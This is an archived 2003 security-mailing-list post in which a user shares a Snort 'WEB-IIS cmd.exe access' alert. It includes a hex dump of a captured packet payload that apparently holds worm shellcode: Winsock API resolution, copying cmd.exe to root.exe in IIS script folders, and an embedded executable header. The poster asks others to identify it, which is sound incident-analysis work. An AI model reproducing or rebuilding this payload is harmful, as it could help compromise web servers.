strange cmd.exe access

From: Q (quentyn_at_the-q.co.uk)
Date: 05/29/03

Next message: Justin Pryzby: "Whois updates, Was: [Re: Possible Intrusion Attempt?]"

Previous message: Russell Harding: "RE: A question for the list..."
Next in thread: James C. Slora, Jr.: "RE: strange cmd.exe access"
Maybe reply: James C. Slora, Jr.: "RE: strange cmd.exe access"
Maybe reply: Jeff Adams: "RE: strange cmd.exe access"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: Thu, 29 May 2003 20:10:25 +0100 (BST)
To: incidents@securityfocus.com

Hi I saw this packet

#(3 - 261684) [2003-05-09 19:43:00] [snort/1002] WEB-IIS cmd.exe access
IPv4: 194.204.X.X -> X.X.X.X
hlen=5 TOS=0 dlen=1472 ID=57174 flags=0 offset=0 TTL=116
chksum=60435
TCP: port=27761 -> dport: 80 flags=***A**** seq=915915841
ack=1210973630 off=5 res=0 win=17184 urp=0 chksum=16151
Payload: length = 1432

000 : FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 47 6C .u..U..E......Gl
010 : 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF 75 FC obalAddAtomA..u.
020 : FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F 73 65 .U..E......Close
030 : 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 45 D0 Handle..u..U..E.
040 : E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF 75 FC ....._lcreat..u.
050 : FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 72 69 .U..E......_lwri
060 : 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 00 00 te..u..U..E.....
070 : 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 F8 89 ._lclose..u..U..
080 : 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 65 6D E......GetSystem
090 : 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 E8 0B Time..u..U..E...
0a0 : 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 FF 55 ...WS2_32.DLL..U
0b0 : F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 74 00 ..E......socket.
0c0 : FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 63 6C .u..U..E......cl
0d0 : 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF 55 F8 osesocket..u..U.
0e0 : 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 6F 63 .E......ioctlsoc
0f0 : 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 08 00 ket..u..U..E....
100 : 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF 55 F8 ..connect..u..U.
110 : 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 00 FF .E......select..
120 : 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 65 6E u..U..E......sen
130 : 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 00 00 d..u..U..E......
140 : 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 E8 0C recv..u..U..E...
150 : 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 00 FF ...gethostname..
160 : 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 65 74 u..U..E......get
170 : 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC FF 55 hostbyname..u..U
180 : F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 74 4C ..E......WSAGetL
190 : 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 F8 89 astError..u..U..
1a0 : 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E 44 4C E......USER32.DL
1b0 : 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 78 69 L..U..E......Exi
1c0 : 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 FF 55 tWindowsEx..u..U
1d0 : F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 40 89 ..E...E.i.....@.
1e0 : 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 C3 E8 E....xV4........
1f0 : E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ED FF ....<.t.<.t.....
200 : FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 E8 DC ................
210 : FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 FF FF ................
220 : FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 FF FF ..... ..........
230 : FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 00 FF ................
240 : FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 D8 F7 .........Y...#..
250 : D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F 80 FB .#.X......t...
260 : E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 01 00 .t.;.X...t..h...
270 : 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 5C FE ...\...P.U....\.
280 : FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 45 00 .......\CMD.EXE.
290 : 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 64 3A ^.....cj......d:
2a0 : 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 74 73 \inetpub\scripts
2b0 : 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 8D \root.exe...$...
2c0 : 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 00 00 .\...P.U.j..+...
2d0 : 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F 6D 6D d:\progra~1\comm
2e0 : 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 41 44 on~1\system\MSAD
2f0 : 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 19 C\root.exe...$..
300 : 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 00 FC ..\...P.U.......
310 : 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF 00 00 MZP.............
320 : B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 01 FC ........@.......
330 : FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 00 FD .......PE..L....
340 : 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F 81 0B *%).............
350 : 01 02 19 00 04 00 00 00 08 00 00 00 00 00 00 00 ................
360 : 10 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 ........ ....@..
370 : 10 00 00 00 04 00 00 01 00 00 00 00 00 00 00 03 ................
380 : 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 00 00 ........@.......
390 : 00 00 00 02 00 00 00 00 00 10 00 00 20 00 00 00 ............ ...
3a0 : 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 ................
3b0 : 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC FC FC ........0.......
3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
3d0 : 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 ................
3e0 : 00 00 00 04 00 00 00 08 00 00 00 00 00 00 00 00 ................
3f0 : 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 ...... ..`......
400 : 00 00 00 10 00 00 00 20 00 00 00 04 00 00 00 0C ....... ........
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 ..............@.
420 : 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 00 30 ...............0
430 : 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC FC FC ......@.........
450 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
460 : FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
470 : FC FC FC FC FC FC 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 40 00 ......h....h. @.
490 : E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 40 00 .a...... @... @.
4a0 : A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 00 00 ....j.h. @..L...
4b0 : E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 00 EB .....h.'...1....
4c0 : EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 10 20 .h.$@.h?...j.h.
4d0 : 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 75 26 @.h.....2.....u&
4e0 : 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 40 00 j.hT @.j.j.hH @.
4f0 : FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 24 40 .5.$@.......5.$@
500 : 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 0F 00 ......h.$@.h?...
510 : 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED 00 00 j.hX @.h........
520 : 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 00 BD ...uU.. @..L....
530 : A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 40 00 . @..B...j.h. @.
540 : 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 00 E8 j.j.h. @..5.$@..
550 : B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A 00 68 ....j.h. @.j.j.h
560 : B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 00 FF . @..5.$@.......
570 : 35 D8 24 40 00 E8 9A 00 00 00 C3 C7 05 D0 24 40 5.$@..........$@
580 : 00 00 04 00 00 68 D0 24 40 00 68 D0 20 40 00 68 .....h.$@.h. @.h
590 : D4 24 40 00 6A 00 55 FF .$@.j.U.

what is strange is that the cmd.exe / root.exe stuff is half way through
with some other code before it

the ip it hit was not mapped to anything ( I believe it is unused) so this
can not have been part of another tcp converstion

any ideas ?

--
The should be a sig here, but it got bored and wandered off 
----------------------------------------------------------------------------
----------------------------------------------------------------------------

Next message: Justin Pryzby: "Whois updates, Was: [Re: Possible Intrusion Attempt?]"

Previous message: Russell Harding: "RE: A question for the list..."
Next in thread: James C. Slora, Jr.: "RE: strange cmd.exe access"
Maybe reply: James C. Slora, Jr.: "RE: strange cmd.exe access"
Maybe reply: Jeff Adams: "RE: strange cmd.exe access"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: Patsy Ramseys 911 call
... Bo Raxo wrote: ... and then read the sig from the note. ... Not strange at all, if ... who took her I would have looked at the SIGline!, ...
(alt.true-crime)
Re: For loops help
... i just can speak a little englise. ... Your sig didn't show that time, ... *is* a strange place, after all. ...
(comp.lang.c)
Re: Warning: VOZ built sysadmins, lusers
... On 27 Dec 2011 22:40:22 GMT, Joe Zeff wrote: ... statements in science was, "That's strange, it wasn't supposed to do ... I've got a sig that I think is unattributed that says ...
(alt.sysadmin.recovery)
Re: HbA1c
... or lack of it - in their sig. ... That'd be a pain though, having to change my sig for every email or ... newsgroup or whatever. ... Maybe I'm strange (OK, I *know* I'm strange, but I'm old enough now that I ...
(alt.support.diabetes)
Re: [patch 2/5] signalfd v2 - signalfd core ...
... This mimics the LEGACY_QUEUEcheck, ... be pending in ctx->pending just because it was not signalfd_fetchsiged, ... if (sig_ignored(t, sig)) ... It is strange that we are doing signalfd_notifyeven if the signal is ignored. ...
(Linux-Kernel)